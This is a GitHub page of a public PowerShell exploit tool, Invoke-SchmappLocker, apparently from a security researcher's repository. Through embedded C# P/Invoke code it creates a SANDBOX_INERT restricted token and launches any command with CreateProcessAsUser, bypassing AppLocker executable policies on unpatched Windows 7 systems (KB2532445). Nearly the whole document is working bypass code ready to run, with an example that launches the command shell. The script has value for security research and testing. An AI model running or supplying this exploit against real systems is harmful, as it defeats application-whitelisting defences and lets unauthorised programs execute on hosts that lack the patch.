-
Notifications
You must be signed in to change notification settings - Fork 5
/
Invoke-SchmappLocker.ps1
206 lines (177 loc) · 4.94 KB
/
Invoke-SchmappLocker.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
function Invoke-SchmappLocker {
<#
.SYNOPSIS
This script exploits KB2532445 via the CreateRestrictedToken function and
corresponding SANDBOX_INERT flag. Tested on Win7 with AppLocker enabled.
.DESCRIPTION
Bypasses AppLocker EXE file policies.
.PARAMETER cmdline
Mandatory, the full path to the command to execute.
.EXAMPLE
Invoke-SchmappLocker $env:comspec
Execute the command interpreter
.LINK
Blog: http://baileysoriginalirishtech.blogspot.com/2015/06/applocker-schmapplocker.html
Github repo: https://github.com/strictlymike/Invoke-SchmappLocker
Hotfix: https://support.microsoft.com/en-us/kb/2532445
Blog on PowerShell P/Invoke: http://blogs.technet.com/b/heyscriptingguy/archive/2013/10/19/weekend-scripter-use-powershell-and-pinvoke-to-remove-stubborn-files.aspx
#>
[CmdletBinding()]
param (
[parameter(Mandatory=$true,ValueFromPipeline=$true)]
[string[]]$cmdline
)
PROCESS
{
Add-Type @"
using System;
using System.Text;
using System.Runtime.InteropServices;
public class SchmappLocker
{
// GetCurrentProcess
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
// OpenProcessToken
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool OpenProcessToken(IntPtr ProcessHandle,
UInt32 DesiredAccess, out IntPtr TokenHandle);
private static uint STANDARD_RIGHTS_REQUIRED = 0x000F0000;
private static uint STANDARD_RIGHTS_READ = 0x00020000;
private static uint TOKEN_ASSIGN_PRIMARY = 0x0001;
private static uint TOKEN_DUPLICATE = 0x0002;
private static uint TOKEN_IMPERSONATE = 0x0004;
private static uint TOKEN_QUERY = 0x0008;
private static uint TOKEN_QUERY_SOURCE = 0x0010;
private static uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
private static uint TOKEN_ADJUST_GROUPS = 0x0040;
private static uint TOKEN_ADJUST_DEFAULT = 0x0080;
private static uint TOKEN_ADJUST_SESSIONID = 0x0100;
private static uint TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
private static uint TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID);
// CreateRestrictedToken
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool CreateRestrictedToken(
IntPtr ExistingTokenHandle,
UInt32 Flags,
UInt32 DisableSidCount,
IntPtr SidsToDisable,
UInt32 DeletePrivilegeCount,
IntPtr PrivilegesToDelete,
UInt32 RestrictedSidCount,
IntPtr SidsToRestrict,
out IntPtr NewTokenHandle
);
// private static uint DISABLE_MAX_PRIVILEGE = 0x1;
private static uint SANDBOX_INERT = 0x2;
// private static uint LUA_TOKEN = 0x4;
// private static uint WRITE_RESTRICTED = 0x8;
// CreateProcessAsUser
[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Auto)]
static extern bool CreateProcessAsUser(
IntPtr hToken,
string lpApplicationName,
/* Hacky */ IntPtr lpCommandLine,
IntPtr lpProcessAttributes,
IntPtr lpThreadAttributes,
bool bInheritHandles,
uint dwCreationFlags,
IntPtr lpEnvironment,
/* So hacky */ IntPtr lpCurrentDirectory,
ref STARTUPINFO lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation
);
[StructLayout(LayoutKind.Sequential)]
internal struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
struct STARTUPINFO
{
public Int32 cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public Int32 dwX;
public Int32 dwY;
public Int32 dwXSize;
public Int32 dwYSize;
public Int32 dwXCountChars;
public Int32 dwYCountChars;
public Int32 dwFillAttribute;
public Int32 dwFlags;
public Int16 wShowWindow;
public Int16 cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
static public int Run(string cmdline)
{
IntPtr CurrentProc;
IntPtr Token;
IntPtr NewToken;
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
bool Ok;
CurrentProc = GetCurrentProcess();
Ok = OpenProcessToken(CurrentProc, TOKEN_ALL_ACCESS, out Token);
if (!Ok)
{
Console.WriteLine("OpenProcessToken failed\n");
return 1;
}
Ok = CreateRestrictedToken(
Token,
SANDBOX_INERT,
0,
IntPtr.Zero,
0,
IntPtr.Zero,
0,
IntPtr.Zero,
out NewToken
);
if (!Ok)
{
Console.WriteLine("CreateRestrictedToken failed\n");
return 1;
}
Ok = CreateProcessAsUser(
NewToken,
cmdline,
IntPtr.Zero,
IntPtr.Zero,
IntPtr.Zero,
true,
0,
IntPtr.Zero,
IntPtr.Zero,
ref si,
out pi
);
if (!Ok)
{
Console.WriteLine(
"CreateProcessAsUser failed, {0}\n",
Marshal.GetLastWin32Error()
);
return 1;
}
return 0;
}
}
"@
[SchmappLocker]::Run($cmdline)
}
}